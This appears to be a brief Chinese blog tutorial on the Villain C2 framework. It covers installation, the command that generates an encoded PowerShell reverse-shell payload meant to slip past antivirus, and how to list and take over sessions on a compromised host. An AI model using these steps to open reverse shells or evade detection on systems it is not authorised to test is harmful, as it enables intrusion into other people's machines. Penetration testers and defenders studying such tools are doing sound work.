本文为大家介绍一款基于Windows和Linux和C2框架Villain的安装和使用。支持文件上传和多个会话之间的切换。

关于

Villain是一个C2框架，可以处理多个基于TCP和HoaxShell的反向shell。并且自动化加密payload来逃逸杀毒软件。

安装

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

运行

使用教程

这里我们以生成windows系统为例。生成一个shell.

generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode

我们在cmd中运行powershell命令。效果如下

这时候，在终端中就可以看到，目标已经上线了。

查看当前会话

我们输入命令sessions便可以看到，与当前主机连接的会话。

连接会话

我们利用shell+会话id便可以与当前会话建立连接。如

shell 9aa63a-b88b6b-901ce3

如上，我们成功进入了系统的shell。

注意事项

• Villain 具有内置的自动混淆有效载荷功能，可免杀（实测效果一般）
• 每个生成的有效负载只会工作一次。已经使用过的有效负载不能重新用于建立会话。
• 如果两个设备不在同一局域网，需要做端口映射。